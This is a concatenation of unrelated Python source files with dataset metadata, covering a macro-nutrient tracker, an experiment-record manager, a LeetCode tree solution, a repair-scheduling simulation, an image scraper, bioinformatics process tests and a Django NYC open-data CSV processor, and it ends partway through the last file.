get_macros(food)[5])\n if totals['net_carbs'] >= 20.0:\n print (\"You're over your carb limit!!!\")\n else:\n print ('You have {} net carbs left.'.format(20 - totals['net_carbs']))\n return totals\n\n\ndef clear_totals():\n for key in totals:\n totals[key] = 0\n return totals\n\n\ndef calculate_macro_percentages():\n calories = totals['protein']*4 + totals['fat']*9 + totals['net_carbs']*4\n protein_percent = str((totals['protein'] * 4 / calories)*100) + '%'\n fat_percent = str((totals['fat'] * 9 / calories)*100) + '%'\n carb_percent = str((totals['net_carbs'] * 4 / calories)*100) + '%'\n percentages = {\n 'Fat': fat_percent,\n 'Protein': protein_percent,\n 'Carbs': carb_percent,\n 'Net_Carbs': totals['net_carbs']}\n return percentages\n\n\ndef pie_chart_data():\n calories = totals['protein']*4 + totals['fat']*9 + totals['net_carbs']*4 + 1\n protein_percent = totals['protein'] * 4 / calories\n fat_percent = totals['fat'] * 9 / calories\n carb_percent = totals['net_carbs'] * 4 / calories\n percentages = {\n 'Fat': fat_percent,\n 'Protein': protein_percent,\n 'Carb': carb_percent}\n return percentages\n\n\nimport matplotlib.pyplot as plt\nfrom collections import Counter\n\n# Data to plot\nlabels = list(Counter(pie_chart_data()))\nsizes = list(Counter(pie_chart_data()).values())\ncolors = ['lightblue', 'lightcoral', 'yellowgreen']\nexplode = (.1, .1, .1)\n\n# Plot\nplt.pie(sizes, explode=explode, labels=labels, colors=colors,\n autopct='%1.1f%%', shadow=True, startangle=140)\n\nplt.axis('equal')\nplt.show()\n","sub_path":"food_functions.py","file_name":"food_functions.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"372438522","text":"# 不推荐,对象名.类名属性可能已发的问题\n\nclass Tool(object):\n # 定义类属性,记录工具的类型\n cout = 0\n def __init__(self, name):\n self.name = name\n #类的属性+1,注意哈这里不能用self\n Tool.cout += 1\n\ntooll = Tool(\"斧头\")\ntooll1 = Tool(\"榔头\")\ntooll2 = Tool(\"水桶\")\ntooll3 = Tool(\"螺丝刀\")\n\n\ntooll3.cout = 99\nprint(tooll3.cout)\n# 这个陷阱在这里,python赋值意思就是,先找,找不到就是创建一个并且赋值\nprint('====> %d' % Tool.cout)","sub_path":"05类的属性,方法还有静态方法/hm_陷阱.py","file_name":"hm_陷阱.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"383991823","text":"\"\"\"Record class.\"\"\"\nfrom __future__ import annotations\n\nimport collections\nimport shutil\nfrom collections import OrderedDict, UserList\nfrom subprocess import CalledProcessError # noqa: S404\nfrom typing import Any, Callable\n\nimport pymongo\nimport ray\nfrom bson.objectid import ObjectId\nfrom omegaconf import DictConfig, OmegaConf\n\nfrom xplogger.experiment_manager.record import base as base_record\nfrom xplogger.experiment_manager.record import omegaconf as oc_utils\nfrom xplogger.experiment_manager.record.mongo import Record as MongoRecord\nfrom xplogger.experiment_manager.slurm.utils import map_jobid_to_raw_job_id\nfrom xplogger.parser.experiment.experiment import (\n Experiment,\n ExperimentSequence,\n ExperimentSequenceDict,\n)\nfrom xplogger.types import ValueType\n\nLoadExperientFromDirType = Callable[[str], Experiment]\n\n\nclass RecordList(UserList): # type: ignore\n def __init__(self, records: list[base_record.Record]):\n \"\"\"Dict-like interface to a collection of results.\"\"\"\n super().__init__(records)\n\n def update_status(\n self,\n collection: pymongo.collection.Collection, # type: ignore\n new_status: str,\n ) -> None:\n \"\"\"Update the status of the records(in the db).\n\n Args:\n collection (pymongo.collection.Collection):\n\n \"\"\"\n if isinstance(self.data[0], DictConfig):\n\n def process_record(record: base_record.Record) -> dict: # type: ignore\n # error: Returning Any from function declared to return \"Dict[Any, Any]\"\n data = OmegaConf.to_container(record)\n assert isinstance(data, dict)\n return data\n\n else:\n\n def process_record(record: base_record.Record) -> base_record.Record: # type: ignore\n # error: All conditional function variants must have identical signatures\n return record\n\n for data_record in self.data:\n record = process_record(data_record)\n issue_id = record[\"setup\"][\"git\"][\"issue_id\"]\n print(issue_id)\n record[\"status\"] = new_status\n key = \"_id\"\n if key in record:\n _id = ObjectId(record.pop(\"_id\"))\n else:\n key = \"id\"\n _id = ObjectId(record.pop(key))\n print(collection.replace_one({\"_id\": _id}, record).raw_result)\n\n def mark_analyzed(self, collection: pymongo.collection.Collection) -> None: # type: ignore\n # error: Missing type parameters for generic type \"Collection\"\n \"\"\"Mark records as analyzed (in the db).\n\n Args:\n collection (pymongo.collection.Collection):\n\n \"\"\"\n return self.update_status(collection=collection, new_status=\"ANALYZED\")\n\n def add_slurm_field(self, collection: pymongo.collection.Collection) -> None: # type: ignore\n \"\"\"Add slurm field to records (in the db).\n\n Args:\n collection (pymongo.collection.Collection):\n\n \"\"\"\n if isinstance(self.data[0], DictConfig):\n\n def process_record(record: base_record.Record) -> dict: # type: ignore\n # error: Returning Any from function declared to return \"Dict[Any, Any]\"\n data = OmegaConf.to_container(record)\n assert isinstance(data, dict)\n return data\n\n else:\n\n def process_record(record: base_record.Record) -> base_record.Record: # type: ignore\n # error: All conditional function variants must have identical signatures\n return record\n\n for data_record in self.data:\n record = process_record(data_record)\n if \"slurm\" not in record[\"setup\"]:\n try:\n record[\"setup\"][\"slurm\"] = {\n \"id\": map_jobid_to_raw_job_id(record[\"setup\"][\"slurm\"][\"id\"])\n }\n except CalledProcessError:\n # record[\"setup\"][\"slurm\"] = {\"id\": -1}\n print(record[\"setup\"][\"slurm\"][\"id\"])\n continue\n print(record[\"setup\"][\"slurm\"][\"id\"])\n _id = ObjectId(record.pop(\"_id\"))\n print(collection.replace_one({\"_id\": _id}, record).raw_result)\n\n def delete(\n self,\n collection: pymongo.collection.Collection, # type: ignore\n # error: Missing type parameters for generic type \"Collection\"\n delete_from_filesystem: bool = False,\n ) -> None:\n \"\"\"Delete jobs from the db and filesystem (optionally).\n\n Args:\n collection (pymongo.collection.Collection):\n delete_from_filesystem (bool, optional): Should delete the job\n from the filesystem. Defaults to False.\n \"\"\"\n counter = 0\n for record in self.data:\n counter += 1\n collection.delete_many({\"setup.id\": record[\"setup\"][\"id\"]})\n if delete_from_filesystem:\n try:\n file_path = record[\"logbook\"][\"logger_dir\"]\n shutil.rmtree(file_path)\n except Exception as e:\n print(f\"Failed to delete {file_path}. Reason: {e}\")\n print(counter)\n\n def get_unique_issues(self) -> collections.Counter[str]:\n \"\"\"Get unique issues from the record list.\"\"\"\n return collections.Counter(\n str(record[\"setup\"][\"git\"][\"issue_id\"]) for record in self.data\n )\n\n def get_viz_params(self) -> set[str]:\n \"\"\"Get params for vizualization.\"\"\"\n viz_params = set()\n for record in self.data:\n if record[\"setup\"][\"viz\"][\"params\"]:\n for param in record[\"setup\"][\"viz\"][\"params\"]:\n viz_params.add(param)\n return viz_params\n\n def make_oc_records(self) -> RecordList:\n \"\"\"Make OC records.\"\"\"\n record_list = []\n for record in self.data:\n assert isinstance(record, MongoRecord)\n record_list.append(oc_utils.make_record(mongo_record=record))\n\n return RecordList(record_list)\n\n def ray_make_oc_records(self) -> RecordList:\n \"\"\"Make OC records using ray.\"\"\"\n futures = [\n oc_utils.ray_make_record.remote(mongo_record=record) for record in self.data\n ]\n records = ray.get(futures)\n return RecordList(records=records)\n\n def map_to_slurm_id(self) -> dict[str, RecordList]:\n \"\"\"Map the record list to a list of slurm ids.\n\n Returns:\n dict[str, RecordList]: dictionary where the key is the slurm id\n and value is the list of records. We return a list of records\n as sometimes the records are duplicated.\n \"\"\"\n\n def _make_empty_record_list() -> RecordList:\n return RecordList([])\n\n mapping: dict[str, RecordList] = collections.defaultdict(\n _make_empty_record_list\n )\n for record in self.data:\n key = str(record[\"setup\"][\"slurm\"][\"id\"].replace(\"_\", \"-\"))\n mapping[key].append(record)\n return mapping\n\n # todo: rename this\n def get_groups_and_hyperparams(\n self, viz_params: list[str]\n ) -> tuple[dict[Any, RecordList], dict[str, set[ValueType]]]:\n \"\"\"Group experiments.\"\"\"\n groups: dict[Any, RecordList] = {}\n hyperparams: dict[str, set[Any]] = {}\n id_set = set()\n for record in self.data:\n params = base_record.get_experiment_params(record, viz_params)\n for param_name, value in params.items():\n if param_name not in hyperparams:\n hyperparams[param_name] = set()\n if isinstance(value, list):\n hyperparams[param_name].add(tuple(value))\n else:\n hyperparams[param_name].add(value)\n key = OmegaConf.create(params)\n if key not in groups:\n groups[key] = RecordList([])\n _id = record.id\n if _id not in id_set:\n groups[key].append(record)\n id_set.add(_id)\n\n return groups, hyperparams\n\n def load_experiments(\n self,\n load_experiment_from_dir: LoadExperientFromDirType,\n ) -> ExperimentSequence:\n \"\"\"Load experiments.\"\"\"\n experiments = [\n base_record.load_experiment(\n record=record,\n load_experiment_from_dir=load_experiment_from_dir,\n )\n for record in self.data\n ]\n exp_seq = ExperimentSequence([exp for exp in experiments if exp is not None])\n return exp_seq\n\n def make_experiment_sequence_dict_groups_and_hyperparams(\n self,\n viz_params: list[str],\n load_experiment_from_dir: LoadExperientFromDirType,\n ) -> tuple[\n ExperimentSequenceDict, dict[Any, RecordList], dict[str, set[ValueType]]\n ]:\n \"\"\"Make experiment groups.\"\"\"\n groups, hyperparams = self.get_groups_and_hyperparams(viz_params=viz_params)\n experiment_sequence_dict = ExperimentSequenceDict(\n {\n key: record_list.load_experiments(\n load_experiment_from_dir=load_experiment_from_dir\n )\n for key, record_list in groups.items()\n }\n )\n return experiment_sequence_dict, groups, hyperparams\n\n def ray_make_experiment_sequence_dict_groups_and_hyperparams(\n self,\n viz_params: list[str],\n load_experiment_from_dir: LoadExperientFromDirType,\n ) -> tuple[\n ExperimentSequenceDict, dict[Any, RecordList], dict[str, set[ValueType]]\n ]:\n \"\"\"Make experiment groups.\"\"\"\n groups, hyperparams = self.get_groups_and_hyperparams(viz_params=viz_params)\n\n groups = OrderedDict(groups)\n\n experiment_sequence_dict = ExperimentSequenceDict(\n {\n key: ray_load_experiments.remote(\n record_list=record_list,\n load_experiment_from_dir=load_experiment_from_dir,\n )\n for key, record_list in groups.items()\n }\n )\n for key in experiment_sequence_dict:\n experiment_sequence_dict[key] = ExperimentSequence(\n ray.get(experiment_sequence_dict[key])\n )\n return experiment_sequence_dict, groups, hyperparams\n\n def get_unique(self, key_func: Callable[[base_record.Record], str]) -> RecordList:\n \"\"\"Get unique records from the current record list.\n\n Args:\n key_func (Callable[[base_record.Record], str]): This function\n computes the key (or hash) unsed to identify a record.\n\n Returns:\n RecordList: List of unique records.\n \"\"\"\n seen_keys = set()\n unique_records = []\n for record in self.data:\n key = key_func(record)\n if key not in seen_keys:\n seen_keys.add(key)\n unique_records.append(record)\n return RecordList(unique_records)\n\n\n@ray.remote # type: ignore\n# Untyped decorator makes function \"ray_load_experiments\" untyped\ndef ray_load_experiments(\n record_list: RecordList,\n load_experiment_from_dir: LoadExperientFromDirType,\n) -> Any:\n \"\"\"Load experiments.\"\"\"\n futures = [\n base_record.ray_load_experiment.remote(\n record=record,\n load_experiment_from_dir=load_experiment_from_dir,\n )\n for record in record_list.data\n ]\n\n return ray.get(futures)\n","sub_path":"xplogger/experiment_manager/record/record_list.py","file_name":"record_list.py","file_ext":"py","file_size_in_byte":11568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"243666872","text":"'''\n513. Find Bottom Left Tree Value\nDescription Submission Solutions Add to List\nTotal Accepted: 2100\nTotal Submissions: 4185\nDifficulty: Medium\nContributors: abhijeet17\nGiven a binary tree, find the leftmost value in the last row of the tree.\n\nExample 1:\nInput:\n\n 2\n / \\\n 1 3\n\nOutput:\n1\nExample 2: \nInput:\n\n 1\n / \\\n 2 3\n / / \\\n 4 5 6\n /\n 7\n\nOutput:\n7\n'''\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def findBottomLeftValue(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n maxlst = [root.val]\n self.nodedepth(root, 0, maxlst)\n return maxlst[-1]\n def nodedepth(self, node, depth, maxlst):\n if not node.left and not node.right:\n return\n elif not node.left:\n if len(maxlst) < depth+2:\n maxlst.append(node.right.val)\n self.nodedepth(node.right, depth+1, maxlst)\n elif not node.right:\n if len(maxlst) < depth+2:\n maxlst.append(node.left.val)\n self.nodedepth(node.left, depth+1, maxlst)\n else:\n if len(maxlst) < depth+2:\n maxlst.append(node.left.val)\n self.nodedepth(node.left, depth+1, maxlst)\n self.nodedepth(node.right, depth+1, maxlst)","sub_path":"en/find-bottom-left-tree-value.py","file_name":"find-bottom-left-tree-value.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"331338907","text":"import collections\nimport re\nimport jieba\n\ndef stats_text_cn(w):\n if type(w) != str:\n raise ValueError('Oops! That was not a string type. Try again...')\n cn = re.findall(r'[\\u4e00-\\u9fa5]', w)\n cn_join = ''.join(cn)\n seg_cn = jieba.cut(cn_join)\n seg_words = []\n for element in seg_cn:\n if len(element) > 1:\n seg_words.append(element)\n count = 20\n cn_count = collections.Counter(seg_words).most_common(count)\n return cn_count\n\ndef stats_text_en(w):\n if type(w) != w:\n raise ValueError('Oops! That was not a string type. Try again...')\n en = re.findall(r'[a-zA-Z\\s]', w)\n en = ''.join(en)\n en = en.split()\n count = 200\n en_count = collections.Counter(en).most_common(count)\n return en_count\n\ndef stats_text(w):\n text_count = stats_text_cn+stats_text_en\n return text_count\n","sub_path":"exercises/1901100025/d10/mymodule/stats_word.py","file_name":"stats_word.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"521096486","text":"import copy\n\nimport mcts\nimport numpy as np\n\n\nclass Repairman:\n def __init__(self, env, system, capacity, scheduling_policy):\n self.env = env\n self.system = system\n \n self.capacity = capacity\n self.utilization = 0\n\n self.scheduling_policy = scheduling_policy \n\n # queue data in the form of [time, queue level]\n self.queue_data = np.zeros((0, 2))\n\n \n def get_queue(self):\n queue = []\n #print(f't={self.env.now}')\n for machine in self.system.machines:\n #print(f'M{machine.index}', machine.__dict__, '\\n\\n')\n if (\n (machine.in_queue) \n and (machine.health > 0)\n #or ((not machine.under_repair) and (machine.get_health(self.env.now) >= machine.maintenance_threshold))\n # TODO: fix this behavior\n # currently machine health data is updated before it is placed \n # in the queue, so if it fails at the same time as MCTS is \n # formulated it will not be considered in the schedule, but will\n # still fail\n ):\n queue.append(machine)\n\n return queue\n \n\n def schedule_maintenance(self):\n queue = self.get_queue()\n\n if self.system.debug:\n if self.system.mcts_system:\n print('MCTS: ', end='')\n print(f'Queue at t={self.env.now}: {[(machine.index, machine.get_health(self.env.now)) for machine in queue]}')\n \n if (len(queue) == 0) or (self.utilization == self.capacity):\n self.update_queue_data()\n return\n elif len(queue) == 1:\n if self.system.debug:\n if self.system.mcts_system:\n print('MCTS: ', end='')\n print(f'Queue length 1, repairman starting maintenance on M{queue[0].index} at t={self.env.now}')\n #self.utilization += 1\n next_machine = queue[0]\n #self.env.process(queue[0].repair())\n #return\n #elif type(self.scheduling_policy) == list:\n # # schedule according to list, [first, second, third, ...]\n # if self.system.debug:\n # if self.system.mcts_system:\n # print('MCTS: ', end='')\n # print(f'Repairman\\'s current schedule: {self.scheduling_policy}')\n # for machine in queue:\n # #try: # TODO: fix this block\n # if machine.index == self.scheduling_policy[0]:\n # next_machine = machine\n # del(self.scheduling_policy[0])\n # break\n # #except:\n # # print('ERROR HERE')\n # # print(f't={self.env.now}', self.scheduling_policy, [m.index for m in queue])\n # # print([machine.allow_new_failures for machine in self.system.machines])\n # #self.env.process(next_machine.repair())\n else: # len(queue) > 1\n next_machine = self.resolve_simultaneous_repairs()\n \n self.utilization += 1\n self.env.process(next_machine.repair())\n \n\n def resolve_simultaneous_repairs(self):\n queue = self.get_queue()\n\n # FIFO policy\n next_machine = min(queue, key=lambda m: m.time_entered_queue)\n \n if self.system.debug:\n if self.system.mcts_system:\n print('MCTS: ', end='')\n print(f'Repairman selecting M{next_machine.index} for repair at t={self.env.now}')\n\n #self.utilization += 1\n #self.env.process(next_machine.repair())\n return next_machine\n\n\n def update_queue_data(self):\n queue_length = len(self.get_queue())\n self.queue_data = np.append(\n self.queue_data, [[self.env.now, queue_length]], axis=0\n )\n","sub_path":"simantha/Repairman.py","file_name":"Repairman.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"364465268","text":"import urllib.request\nimport urllib.error\nimport os\nfrom bs4 import BeautifulSoup\n\nclass Spider:\n mainPage = ''\n root = ''\n maxPage = ''\n tree = {}\n\n def __init__(self, mainPage, maxPage, root):\n self.mainPage = mainPage\n self.maxPage = maxPage\n self.root = root\n\n #解析html\n def __getHtmlContent(self, url):\n try:\n res = urllib.request.urlopen(url, timeout=5)\n html = res.read().decode('utf-8')\n return BeautifulSoup(html)\n except urllib.error.HTTPError:\n print('timeout')\n return ''\n except Exception:\n return ''\n\n #保存图片\n def __saveImage(self, url, path, filename):\n try:\n if not os.path.exists(path):\n os.makedirs(path)\n if os.path.exists(path+filename):\n return ''\n img = urllib.request.urlopen(url, timeout=5)\n img = img.read()\n file = open(path+filename, 'wb')\n file.write(img)\n file.close()\n return ''\n except urllib.error.HTTPError:\n print('timeout')\n return ''\n except Exception:\n print('wrong')\n return ''\n\n\n #得到一个女孩的图片地址列表\n def __getOneGirlImageUrls(self, url):\n list = []\n try:\n #得到每个人的总页数\n totalPage = self.__getHtmlContent(url).find(id = 'opic').previous_sibling.string\n for page in range(1, int(totalPage)):\n page = str(page)\n html = self.__getHtmlContent(url + '/' + page)\n res = html.find(id='content')\n src = res.a.img['src']\n list.append(src)\n except Exception:\n print('wrong')\n return list\n\n\n #得到网站图片url树形结构\n def __getNodeTree(self):\n for page in range(1, self.maxPage):\n page = str(page)\n self.tree[page] = {}\n mainHtml = self.__getHtmlContent(self.mainPage+'/'+page)\n try:\n images = mainHtml.find_all('li')\n for li in images:\n coverImg = li.a.img['src']\n coverName = li.a.img['alt']\n coverUrl = li.a['href']\n self.tree[page][coverImg] = {}\n temp = {'name':'', 'img':'', 'list':[]}\n temp['name'] = coverName\n temp['img'] = coverImg\n temp['list'] = self.__getOneGirlImageUrls(coverUrl)\n self.tree[page][coverImg] = temp\n print(temp)\n except Exception:\n print('wrong')\n print(self.tree)\n\n\n def __parserTree(self):\n for page in self.tree:\n for coverImg in self.tree[page]:\n coverImg = self.tree[page][coverImg]['img']\n coverName = self.tree[page][coverImg]['name']\n coverList = self.tree[page][coverImg]['list']\n path = self.root+'/'+str(page)+'/'+coverName+'/'\n filename = 'cover.jpg'\n self.__saveImage(coverImg, path, filename)\n print(path + filename)\n i = 1\n for list in coverList:\n filename = str(i)+'.jpg'\n self.__saveImage(list, path, filename)\n i += 1\n print(path + filename)\n\n\n def run(self):\n print('生成网站图片结构树....')\n self.__getNodeTree()\n print('网站结构树生成完毕,开始爬取图片....')\n self.__parserTree()\n print('爬取完毕!')\n\nif __name__ == \"__main__\":\n spider = Spider('http://www.mmjpg.com/home', 2, 'image')\n print('进程开始....')\n spider.run()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"619091817","text":"from resolwe.flow.models import Data\nfrom resolwe.test import tag_process\n\nfrom resolwe_bio.utils.test import BioProcessTestCase\n\n\nclass PlotsProcessorTestCase(BioProcessTestCase):\n @tag_process(\"bamplot\")\n def test_bamplot(self):\n with self.preparation_stage():\n inputs = {\n \"src\": \"bamplot_alignment.bam\",\n \"species\": \"Homo sapiens\",\n \"build\": \"hg19\",\n }\n bam = self.run_process(\"upload-bam\", inputs)\n\n inputs = {\n \"src\": \"bamplot_alignment.bam\",\n \"species\": \"Homo sapiens\",\n \"build\": \"hg19\",\n }\n bam1 = self.run_process(\"upload-bam\", inputs)\n\n bed_input = {\n \"src\": \"bamplot.bed\",\n \"species\": \"Homo sapiens\",\n \"build\": \"hg19\",\n }\n bed = self.run_process(\"upload-bed\", bed_input)\n\n inputs = {\n \"src\": \"bamplot.gff\",\n \"source\": \"NCBI\",\n \"species\": \"Homo sapiens\",\n \"build\": \"GRCh38\",\n }\n gff = self.run_process(\"upload-gtf\", inputs)\n\n inputs = {\n \"genome\": \"HG19\",\n \"input_region\": \"chr1:+:41468594-41566948\",\n \"bam\": [bam.pk, bam1.pk],\n \"color\": \"0,69,134\",\n \"names\": [\"WNT\", \"bbb\"],\n \"yscale\": \"uniform\",\n \"title\": \"SINGLE_REGION\",\n \"plot\": \"multiple\",\n \"rpm\": True,\n }\n self.run_process(\"bamplot\", inputs)\n\n inputs = {\n \"genome\": \"HG19\",\n \"input_gff\": gff.pk,\n \"bam\": [bam.pk],\n \"color\": \"255,192,0\",\n \"names\": [\"GROUP3_MB\"],\n \"yscale\": \"uniform\",\n \"title\": \"SINGLE_REGION\",\n \"plot\": \"multiple\",\n \"rpm\": True,\n \"bed\": [bed.pk],\n }\n self.run_process(\"bamplot\", inputs)\n\n for data in Data.objects.all():\n self.assertStatus(data, Data.STATUS_DONE)\n\n @tag_process(\"bamliquidator\")\n def test_bamliquidator(self):\n with self.preparation_stage():\n inputs = {\n \"src\": \"bamplot_ alignment1.bam\",\n \"species\": \"Homo sapiens\",\n \"build\": \"hg19\",\n }\n bam1 = self.run_process(\"upload-bam\", inputs)\n\n inputs = {\n \"src\": \"bamplot_alignment.bam\",\n \"species\": \"Homo sapiens\",\n \"build\": \"hg19\",\n }\n bam = self.run_process(\"upload-bam\", inputs)\n\n inputs = {\n \"src\": \"bamplot.gff\",\n \"source\": \"NCBI\",\n \"species\": \"Homo sapiens\",\n \"build\": \"GRCh38\",\n }\n gff = self.run_process(\"upload-gtf\", inputs)\n\n inputs = {\"bam\": [bam1.id, bam.id], \"cell_type\": \"MCD cell\", \"extension\": 200}\n\n bamliquidator = self.run_process(\"bamliquidator\", inputs)\n del bamliquidator.output[\"summary\"][\"total_size\"] # Non-deterministic output.\n self.assertFields(\n bamliquidator, \"summary\", {\"file\": \"output/summary.html\", \"size\": 524296}\n )\n\n inputs[\"regions_gtf\"] = gff.id\n inputs[\"analysis_type\"] = \"region\"\n self.run_process(\"bamliquidator\", inputs)\n\n for data in Data.objects.all():\n self.assertStatus(data, Data.STATUS_DONE)\n","sub_path":"resolwe_bio/tests/processes/test_plots.py","file_name":"test_plots.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281651620","text":"def get_parameter(name):\n while True:\n p = input(\"Enter the parameter of the equation: %s = \" % name)\n if p.replace('.', '').isdigit() and float(p) != 0:\n p = float(p)\n return p\n else:\n print(\"Please enter the number of non-zero!\")\n\nclass QadraticEquation:\n def __init__(self, a, b, c):\n self.a = a\n self.b = b\n self.c = c\n\n def get_descr(self):\n d = self.b ** 2 - 4 * self.a * self.c\n return d\n\n def res(self, d):\n self.d = d\n if d < 0:\n return(\"No results!\")\n else:\n x1 = (-self.b + self.d **(1/2.0)) / 2 * self.a\n x2 = (-self.b - self.d **(1/2.0)) / 2 * self.a\n return(\"Results: x1 = %s, x2 = %s\" % (x1, x2))\n","sub_path":"week3]/quadro/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"122030724","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\nimport os\nimport sys\nimport json\nimport csv\nimport re\nimport string\nfrom noise.models import Building\n\n#from noise.models import BuildingBuildingExtraInfo, HandyManWorkOrderCharges, ECBViolation, BuildingImage, DOBComplaint, Complaint, Review, ReviewImage, Building, Violation, WorkPermit, BuildingOwner\n\nimport pandas as pd\n\n\n\"\"\"\nDownloading data sets and processing CSVs from nycopendata\n\"\"\"\n\ndef process_handyman_work_order(file_name, new_file_name):\n\t\"\"\"process each row of HWO data\"\"\"\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(HWOID, HWONumber, building_id, boro_id, boro, house_number, streetname, zipcode, block, lot, lifecycle, worktypegeneral, hwo_status_reason, hwo_create_date, is_aep, is_commercial_demolition, fema_event_id, fema_event, hwo_description, hwo_approved_amount, sales_tax, admin_fee, charge_amount, date_transfer_dof) = row\n\t\t\tbuilding_id = str(row[2]).strip()\n\t\t\tboro = str(row[3]).strip()\n\t\t\tblock = str(row[8]).strip()\n\t\t\tlot = str(row[9]).strip()\n\t\t\tborough = str(row[4]).strip()\n\t\t\thouse_number = str(row[5]).strip()\n\t\t\tstreetname = str(row[6]).strip()\n\t\t\tzip_code = str(row[7]).strip()\n\t\t\tblock = str(row[8]).strip()\n\t\t\tlot = str(row[9]).strip()\n\t\t\twork_type_general = str(row[11]).strip()\n\t\t\t#put this address in a csv to geocode\n\t\t\taddress = house_number + \" \" + streetname + \" \" + borough + \", \" + \"NY\" + \" \" + zip_code\n\t\t\taddress_list = (house_number, streetname, boro, zip_code)\n\t\t\t#address_row = (building_id, address)\n\t\t\taddresses.writerow(address_list)\n\t\t\thwo_number = str(row[1]).strip()\n\t\t\thwo_create_date = str(row[13]).strip()\n\t\t\tmonth = hwo_create_date[:2]\n\t\t\tday = hwo_create_date[3:5]\n\t\t\tyear = hwo_create_date[6:10]\n\t\t\thwo_description = str(row[18]).strip()\n\t\t\tcommunity_board='NA'\n\t\t\tnew_row = (hwo_create_date, building_id, borough, house_number, streetname, zip_code, boro+block+lot, work_type_general, hwo_number, year, month, hwo_description)\n\t\t\twriter.writerow(new_row)\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\n\ndef process_ecb_violations(file_name, new_file_name):\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 'respondents.csv', 'a') as landlord_write, open(settings.ALL_DATA_DIR + 'opendata/' + file_name, 'r') as f, open(settings.ALL_DATA_DIR + 'buildings_data/' + 'building_list.csv', 'a') as building_write:\n\t\twriter = csv.writer(write_file)\n\t\taddresses = csv.writer(address_write)\n\t\trespondents = csv.writer(landlord_write)\n\t\treader_object = csv.reader(f)\n\t\tbuilding_writer = csv.writer(building_write)\n\t\tfor row in reader_object:\n\t\t\t(isn_dob_bis_extract0, ecb_violation_number1, ecb_violation_status2, dob_violation_number3, building_id4, boro5, block6, lot7, hearing_date8, hearing_time9, served_date10, issue_date11, severity12, violation_type13, respondent_name14, respondent_house_number15, respondent_street16, respondent_city17, respondent_zip18, violation_description19, penalty_imposed20, amount_paid21, balance_due22, infraction_code23, section_law_description24, blank25, blank26, blank27, blank28, blank29, blank30, blank31, blank32, blank33, blank34, blank35, blank36, blank37, blank38, blank39, blank40, blank41, blank42, aggravated_level43, hearing_status44, certification_status45) = row\n\t\t\tbuilding_id = str(row[4]).strip()\n\t\t\tboro = str(row[5]).strip()\n\t\t\tblock = str(row[6]).strip()\n\t\t\tlot = str(row[7]).strip()\n\t\t\tviolation_number = str(row[1]).strip()\n\t\t\trespondent_name = str(row[14]).strip()\n\t\t\trespondent_house_number = str(row[15]).strip()\n\t\t\trespondent_street = str(row[16]).strip()\n\t\t\trespondent_zip = str(row[18]).strip()\n\t\t\trespondent_row = (building_id, respondent_name, respondent_house_number, respondent_street, respondent_zip)\n\t\t\trespondents.writerow(respondent_row)\n\t\t\tdob_violation_number = str(row[3]).strip()\n\t\t\thearing_date = str(row[8]).strip()\n\t\t\thearing_status = str(row[44]).strip()\n\t\t\tviolation_description = str(row[19]).strip()\n\t\t\tsection_law_description = str(row[24]).strip()\n\t\t\tseverity = str(row[12]).strip()\n\t\t\tpenalty_imposed = str(row[20]).strip()\n\t\t\tamount_paid = str(row[21]).strip()\n\t\t\tbalance_due = str(row[22]).strip()\n\t\t\tviolation_type = str(row[13]).strip()\n\t\t\tissue_date = str(row[11]).strip()\n\t\t\tissue_year = issue_date[:4]\n\t\t\tissue_month = issue_date[4:6]\n\t\t\thouse_number='NA'\n\t\t\tstreetname='NA'\n\t\t\tzip_code='NA'\n\t\t\tborough='NA'\n\t\t\tcommunity_board='NA'\n\t\t\tnew_row = (building_id, boro+block+lot, issue_date, issue_year, issue_month, violation_description, severity, penalty_imposed, amount_paid, balance_due, violation_type, violation_number, dob_violation_number, hearing_date, hearing_status, respondent_name)\n\t\t\twriter.writerow(new_row)\t\n\treturn settings.ALL_DATA_DIR + 'opendata/restructured_data/%s' % new_file_name\n\ndef process_dob_violations(file_name, new_file_name):\n\tcount = 0\n\twith open(settings.ALL_DATA_DIR + 'opendata/restructured_data/' + new_file_name,'w') as write_file, open(settings.ALL_DATA_DIR + 'addresses.csv', 'a') as address_write, open(settings.ALL_DATA_DIR + 